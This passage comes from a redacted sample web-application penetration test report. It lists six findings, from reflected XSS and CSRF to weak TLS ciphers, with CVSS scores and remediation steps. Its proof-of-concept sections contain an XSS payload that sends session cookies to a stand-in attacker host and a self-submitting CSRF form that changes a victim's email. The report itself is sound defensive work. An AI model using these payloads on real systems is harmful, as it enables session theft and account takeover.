}\n  .cover-meta td:first-child { color: #888; width: 170px; text-transform: uppercase; font-size: 10px; letter-spacing: 1px; }\n  .cover-footer { border-top: 1px solid #333; padding-top: 20px; display: flex; justify-content: space-between; align-items: center; }\n  .cover-footer .logo { font-size: 18px; font-weight: 700; color: #e63946; letter-spacing: 2px; }\n  .cover-footer .conf { font-size: 10px; color: #555; letter-spacing: 2px; text-transform: uppercase; }\n\n  .page { padding: 50px 70px; max-width: 900px; margin: 0 auto; }\n  .page-break { page-break-before: always; }\n\n  h2 { font-size: 18px; font-weight: 700; color: #0f0f1a; border-bottom: 3px solid #e63946; padding-bottom: 8px; margin: 40px 0 20px; text-transform: uppercase; letter-spacing: 1px; }\n  h3 { font-size: 14px; font-weight: 700; color: #0f0f1a; margin: 24px 0 8px; }\n  h4 { font-size: 12px; font-weight: 700; color: #555; text-transform: uppercase; letter-spacing: 1px; margin: 16px 0 6px; }\n  p { margin-bottom: 10px; color: #333; }\n\n  .toc { background: #f8f8f8; border-left: 4px solid #e63946; padding: 24px 28px; margin: 20px 0; }\n  .toc-title { font-weight: 700; font-size: 13px; text-transform: uppercase; letter-spacing: 1px; margin-bottom: 14px; color: #0f0f1a; }\n  .toc ol { padding-left: 18px; }\n  .toc li { padding: 3px 0; color: #444; }\n\n  .exec-box { background: #fff9f9; border: 1px solid #fcc; border-left: 4px solid #e63946; padding: 20px 24px; margin: 20px 0; border-radius: 4px; }\n\n  .risk-summary { display: flex; gap: 12px; margin: 20px 0; flex-wrap: wrap; }\n  .risk-pill { padding: 12px 20px; border-radius: 6px; text-align: center; min-width: 90px; }\n  .risk-pill .count { font-size: 28px; font-weight: 700; display: block; }\n  .risk-pill .label { font-size: 10px; text-transform: uppercase; letter-spacing: 1px; font-weight: 600; }\n  .pill-critical { background: #2d0000; color: #ff4444; }\n  .pill-high { background: #2d1000; color: #ff8c00; }\n  .pill-medium { background: #2d2000; color: #ffd700; }\n  .pill-low { background: #001f2d; color: #00bfff; }\n  .pill-info { background: #1a1a2e; color: #aaa; }\n\n  table { width: 100%; border-collapse: collapse; margin: 14px 0; }\n  th { background: #0f0f1a; color: #fff; padding: 10px 14px; text-align: left; font-size: 11px; text-transform: uppercase; letter-spacing: 1px; }\n  td { padding: 9px 14px; border-bottom: 1px solid #eee; color: #333; font-size: 12px; }\n  tr:nth-child(even) td { background: #fafafa; }\n\n  .badge { display: inline-block; padding: 2px 10px; border-radius: 20px; font-size: 10px; font-weight: 700; text-transform: uppercase; letter-spacing: 1px; }\n  .badge-high { background: #ff8c00; color: #fff; }\n  .badge-medium { background: #f5a623; color: #fff; }\n  .badge-low { background: #00aaff; color: #fff; }\n  .badge-info { background: #888; color: #fff; }\n\n  .finding { border: 1px solid #e0e0e0; border-radius: 8px; margin: 24px 0; overflow: hidden; }\n  .finding-header { padding: 16px 20px; display: flex; align-items: flex-start; justify-content: space-between; gap: 20px; }\n  .finding-header.high { background: #fff5e6; border-bottom: 3px solid #ff8c00; }\n  .finding-header.medium { background: #fffbe6; border-bottom: 3px solid #f5a623; }\n  .finding-header.low { background: #e6f7ff; border-bottom: 3px solid #00aaff; }\n  .finding-header.info { background: #f5f5f5; border-bottom: 3px solid #888; }\n  .finding-id { font-size: 10px; color: #888; margin-bottom: 4px; font-weight: 600; letter-spacing: 1px; text-transform: uppercase; }\n  .finding-title { font-size: 15px; font-weight: 700; color: #0f0f1a; }\n  .finding-meta { display: flex; gap: 8px; align-items: center; margin-top: 6px; flex-wrap: wrap; }\n  .finding-meta span { font-size: 11px; color: #666; }\n  .cvss-score { background: #0f0f1a; color: #fff; padding: 6px 14px; border-radius: 4px; font-size: 20px; font-weight: 700; white-space: nowrap; text-align: center; min-width: 70px; }\n  .cvss-score small { display: block; font-size: 9px; color: #aaa; text-transform: uppercase; letter-spacing: 1px; font-weight: 400; }\n  .finding-body { padding: 20px; }\n  .finding-body h4 { color: #e63946; margin-top: 14px; }\n  .finding-body h4:first-child { margin-top: 0; }\n  .code-block { background: #0f0f1a; color: #a8ff78; font-family: 'Courier New', monospace; padding: 14px 16px; border-radius: 4px; font-size: 11px; margin: 8px 0; overflow-x: auto; white-space: pre; }\n  .rx { background: #555; color: #555; border-radius: 2px; }\n  .evidence-note { background: #f0f0f0; border-left: 3px solid #ccc; padding: 10px 14px; font-size: 11px; color: #666; margin: 8px 0; border-radius: 0 4px 4px 0; font-style: italic; }\n  .remed { background: #f0fff4; border: 1px solid #b7eb8f; border-left: 4px solid #52c41a; padding: 12px 16px; border-radius: 4px; margin-top: 10px; }\n  .remed h4 { color: #237804; margin: 0 0 6px; }\n  .remed p { color: #135200; margin: 0; font-size: 12px; }\n  .watermark { text-align: center; padding: 30px; color: #ccc; font-size: 10px; letter-spacing: 2px; text-transform: uppercase; border-top: 1px solid #eee; margin-top: 40px; }\n\n\n\n\n\n\n  \n\n    \nConfidential &mdash; Redacted Sample\n    \nWeb ApplicationPenetration TestReport\n    \nOWASP Top 10 &middot; Session Management &middot; TLS Configuration &middot; SOC 2 Alignment\n  \n  \n\n    \n\n      Client&nbsp;REDACTED CLIENT LTD&nbsp;\n      Target Application&nbsp;https://app.REDACTED.com&nbsp;\n      EnvironmentProduction (read-only scope)\n      Test Period&nbsp;XX/XX/202X&nbsp; to &nbsp;XX/XX/202X&nbsp;\n      Report Version1.0 Final\n      Prepared ByTejas D. &middot; Independent Security Consultant\n      ClassificationCONFIDENTIAL &mdash; Client Eyes Only\n    \n  \n  \n\n    \nPENTEST REPORT\n    \nThis document is confidential. Unauthorized distribution prohibited.\n  \n\n\n\n\n\n\n1. Executive Summary\n\n\n  \nAn independent web application penetration test was conducted against &nbsp;REDACTED&nbsp;'s core business platform. Testing followed OWASP Testing Guide v4.2 and aligned with SOC 2 Type II security control requirements.\n  \nSix vulnerabilities were identified: 1 High, 2 Medium, 2 Low, 1 Informational. No critical vulnerabilities were found. The most significant finding (FIND-01) allows an attacker to execute arbitrary JavaScript in an authenticated user's browser session, potentially enabling session hijacking or credential theft.\n  \nAll findings include proof-of-concept evidence, CVSS v3.1 scores, and actionable remediation guidance. A retest is recommended within 30 days of remediation deployment.\n\n\n\n2. Scope &amp; Methodology\n\n\n  PhaseActivitiesDuration\n  ReconnaissanceTech fingerprinting, sitemap enumeration, passive reconDay 1\n  AuthenticationLogin brute-force protection, account lockout, password resetDay 1-2\n  Session ManagementCookie analysis, token entropy (Burp Sequencer), fixationDay 2\n  Input ValidationXSS, SQLi, XXE, SSRF across all user-controlled parametersDay 2-3\n  Access ControlHorizontal/vertical privilege escalation, IDORDay 3\n  Transport SecurityTLS version/cipher enumeration, HSTS, certificate validationDay 3\n  Error Handling &amp; HeadersVerbose errors, security header audit, clickjackingDay 4\n  ReportDocumentation, evidence compilation, remediation guidanceDay 5\n\n\n\n3. Risk Summary\n\n\n  \n0Critical\n  \n1High\n  \n2Medium\n  \n2Low\n  \n1Info\n\n\n\n  IDTitleSeverityCVSS v3.1OWASP\n  FIND-01Reflected XSS via Search ParameterHigh7.2A03:2021\n  FIND-02CSRF: Missing Anti-Forgery TokensMedium6.1A01:2021\n  FIND-03Session Cookie Missing HttpOnly/SameSiteMedium5.3A07:2021\n  FIND-04TLS: Weak Cipher Suites Accepted (SWEET32)Low3.7A02:2021\n  FIND-05Verbose .NET Stack Trace DisclosureLow3.1A05:2021\n  FIND-06Missing HTTP Security HeadersInfo&mdash;A05:2021\n\n\n\n4. Detailed Findings\n\n\n\n  \n\n    \n\n      \nFIND-01 &middot; A03:2021 Injection &middot; CWE-79\n      \nReflected Cross-Site Scripting (XSS) &mdash; Search Parameter\n      \nHighCVSS 7.2Affected: /search?q=\n    \n    \n7.2CVSS v3.1\n  \n  \n\n    \nDescription\n    \nThe q parameter on the search endpoint reflects user-supplied input directly into the HTML response without encoding. An attacker can craft a malicious URL causing arbitrary JavaScript to execute in an authenticated victim's browser session.\n    \nProof of Concept\n    \nGET /search?q=&lt;script&gt;document.location='https://[attacker]/c?d='+document.cookie&lt;/script&gt;\nHost: app.&nbsp;REDACTED&nbsp;.com\nCookie: .ASPXAUTH=&nbsp;REDACTED&nbsp;\n    \n[Evidence redacted: screenshot of alert() PoC and cookie exfiltration in test environment available on request]\n    \nImpact\n    \nSession token theft, credential phishing, keylogging. Combined with FIND-03 (missing HttpOnly), severity approaches Critical \u2014 attacker can extract full session cookie via document.cookie.\n    \nCVSS Vector\n    \nCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\n    \n\nRemediation\nHTML-encode all user output via HttpUtility.HtmlEncode() or Razor built-in encoding. Implement CSP script-src 'self' as defense-in-depth. Allowlist/validate q parameter server-side. Target: 7 days.\n  \n\n\n\n\n  \n\n    \n\n      \nFIND-02 &middot; A01:2021 Broken Access Control &middot; CWE-352\n      \nCSRF: Missing Anti-Forgery Tokens on State-Changing Requests\n      \nMediumCVSS 6.1Affected: /account/update-email, /account/change-password\n    \n    \n6.1CVSS v3.1\n  \n  \n\n    \nDescription\n    \nThree POST endpoints modifying account state lack anti-CSRF tokens and do not validate Origin or Referer headers. Browsers automatically include session cookies in cross-origin requests.\n    \nProof of Concept\n    \n&lt;!-- Attacker page --&gt;\n&lt;form action=\"https://app.&nbsp;REDACTED&nbsp;.com/account/update-email\" method=\"POST\"&gt;\n  &lt;input type=\"hidden\" name=\"email\" value=\"attacker@evil.com\"&gt;\n&lt;/form&gt;\n&lt;script&gt;document.forms[0].submit();&lt;/script&gt;\n    \n[Burp Repeater response redacted: 200 OK confirming email changed in test account]\n    \nImpact\n    \nVictim visits attacker page &rarr; email changed to attacker address &rarr; password reset triggered &rarr; full account takeover. SOC 2 CC6.1 control gap.\n    \n\nRemediation\nAdd [ValidateAntiForgeryToken] to all state-changing controller actions. Include @Html.AntiForgeryToken() in forms. Use synchronizer token pattern for API endpoints. Target: 14 days.\n  \n\n\n\n\n  \n\n    \n\n      \nFIND-03 &middot; A07:2021 Auth Failures &middot; CWE-1004\n      \nSession Cookie Missing HttpOnly and SameSite Flags\n      \nMediumCVSS 5.3Affected: ASP.NET_SessionId, .ASPXAUTH\n    \n    \n5.3CVSS v3.1\n  \n  \n\n    \nDescription\n    \nBoth session cookies lack HttpOnly and SameSite attributes. Secure flag is present. Missing HttpOnly allows JavaScript to read cookie values directly from document.cookie.\n    \nEvidence\n    \nSet-Cookie: ASP.NET_SessionId=&nbsp;REDACTED&nbsp;; path=/; Secure\nSet-Cookie: .ASPXAUTH=&nbsp;REDACTED&nbsp;; expires=...; path=/; Secure\n# HttpOnly and SameSite ABSENT from both cookies\n    \nConfirmed via Burp Suite response interceptor and Chrome DevTools Application &gt; Cookies panel.\n    \nImpact\n    \nChained with FIND-01 (XSS): attacker extracts session token via document.cookie, hijacks authenticated session. Without SameSite, FIND-02 (CSRF) also more effective. Combined severity Critical.\n    \n\nRemediation\nIn web.config: &lt;httpCookies httpOnlyCookies=\"true\" sameSite=\"Strict\" requireSSL=\"true\"/&gt;. For forms auth: add cookieSameSite=\"Strict\". Verify post-deploy: IIS config and app-level settings can conflict. Target: 7 days.\n  \n\n\n\n\n  \n\n    \n\n      \nFIND-04 &middot; A02:2021 Cryptographic Failures &middot; CWE-326 &middot; CVE-2016-2183\n      \nTLS: Weak Cipher Suites Accepted (3DES / SWEET32)\n      \nLowCVSS 3.7\n    \n    \n3.7CVSS v3.1\n  \n  \n\n    \nDescription\n    \nServer accepts TLS 1.2 connections using 3DES and CBC-mode AES suites without forward secrecy. TLS 1.3 is supported and preferred, but legacy suites remain negotiable.\n    \nEvidence\n    \n# testssl.sh:\nTLS 1.2   TLS_RSA_WITH_3DES_EDE_CBC_SHA        WEAK\nTLS 1.2   TLS_RSA_WITH_AES_128_CBC_SHA          WEAK (no forward secrecy)\nTLS 1.3   TLS_AES_256_GCM_SHA384                OK\n\n# Manual forced negotiation:\n$ openssl s_client -connect app.&nbsp;REDACTED&nbsp;.com:443 -cipher DES-CBC3-SHA\nCipher: DES-CBC3-SHA    [connected -- not rejected]\n    \n\nRemediation\nDisable legacy ciphers via IIS Crypto. Retain only: TLS_AES_256_GCM_SHA384, TLS_AES_128_GCM_SHA256 (TLS 1.3), TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (TLS 1.2). Verify with Qualys SSL Labs. Target: 30 days.\n  \n\n\n\n\n  \n\n    \n\n      \nFIND-05 &middot; A05:2021 Security Misconfiguration &middot; CWE-209\n      \nVerbose Error Pages: .NET Stack Trace Disclosure\n      \nLowCVSS 3.1Affected: multiple endpoints on malformed input\n    \n    \n3.1CVSS v3.1\n  \n  \n\n    \nDescription\n    \nMalformed input to integer parameters triggers full ASP.NET stack traces exposing internal namespaces, server file paths, and framework version strings.\n    \nEvidence\n    \nSystem.FormatException: Input string was not in a correct format.\n   at &nbsp;REDACTED&nbsp;.Controllers.ReportController.GetById(String id)\n   at C:\\inetpub\\wwwroot\\&nbsp;REDACTED&nbsp;\\Controllers\\ReportController.cs:line 47\nServer: Microsoft-IIS/10.0    ASP.NET Version: 4.8.xxxx\n    \n\nRemediation\nSet customErrors mode=\"On\" in web.config with generic error pages. Add global exception handler returning sanitized responses. Remove Server and X-Powered-By response headers. Target: 14 days.\n  \n\n\n\n\n  \n\n    \n\n      \nFIND-06 &middot; A05:2021 &middot; CWE-693 &middot; Informational\n      \nMissing HTTP Security Headers\n      \nInfoAffected: All responses\n    \n    \n&mdash;CVSS v3.1\n  \n  \n\n    \n\n      HeaderRecommended ValueRisk if Absent\n      X-Frame-OptionsDENYClickjacking\n      Content-Security-Policydefault-src 'self'XSS amplification\n      Strict-Transport-Securitymax-age=31536000; includeSubDomainsSSL stripping\n      X-Content-Type-OptionsnosniffMIME sniffing\n      Referrer-Policystrict-origin-when-cross-originURL leakage\n    \n    \n\nRemediation\nAdd headers via IIS web.config under &lt;httpProtocol&gt;&lt;customHeaders&gt;. Deploy CSP in report-only mode first. Verify at SecurityHeaders.com. Target: 30 days.\n  \n\n\n\n5. Remediation Roadmap\n\n\n  PriorityFindingEffortTargetSOC 2 Control\n  P1FIND-01: XSSLow (output encoding)7 daysCC6.1, CC6.6\n  P1FIND-03: Cookie FlagsLow (config change)7 daysCC6.1, CC6.7\n  P2FIND-02: CSRF TokensMedium14 daysCC6.1, CC6.6\n  P2FIND-05: Error DisclosureLow (config change)14 daysCC7.2\n  P3FIND-04: TLS CiphersLow (IIS Crypto)30 daysCC6.7\n  P4FIND-06: HeadersLow (web.config)30 daysCC6.1\n\n\nRetest recommended within 30 days of remediation deployment to verify all findings resolved prior to SOC 2 audit submission.\n\n\n6. Appendix: Tools &amp; References\n\n\n  ToolPurpose\n  Burp Suite ProProxy, Intruder, Repeater, Sequencer, Scanner\n  OWASP ZAP 2.14Active scan, passive analysis\n  testssl.sh 3.0.9TLS/cipher enumeration\n  nmap 7.94Port scan, ssl-enum-ciphers NSE script\n  nikto 2.1.6Web server misconfiguration baseline\n  sqlmap 1.8SQL injection verification (non-destructive)\n  jwt_tool 2.2.7JWT token analysis and manipulation\n  curl / httpieManual request crafting\n  Chrome DevToolsCookie inspection, DOM analysis, network tab\n\n\n\nStandards referenced: OWASP Testing Guide v4.2 &middot; OWASP Top 10 2021 &middot; CVSS v3.1 (FIRST.org) &middot; NIST SP 800-115 &middot; SOC 2 TSC (AICPA 2017) &middot; Microsoft IIS Security Best Practices\n\n\nSAMPLE REPORT &mdash; REDACTED FOR PORTFOLIO USE &mdash; CONFIDENTIAL &mdash; Prepared by Tejas D. &middot; Independent Security Consultant\n\n\n\n", "creation_timestamp": "2026-06-23T16:29:40.000000Z"}]}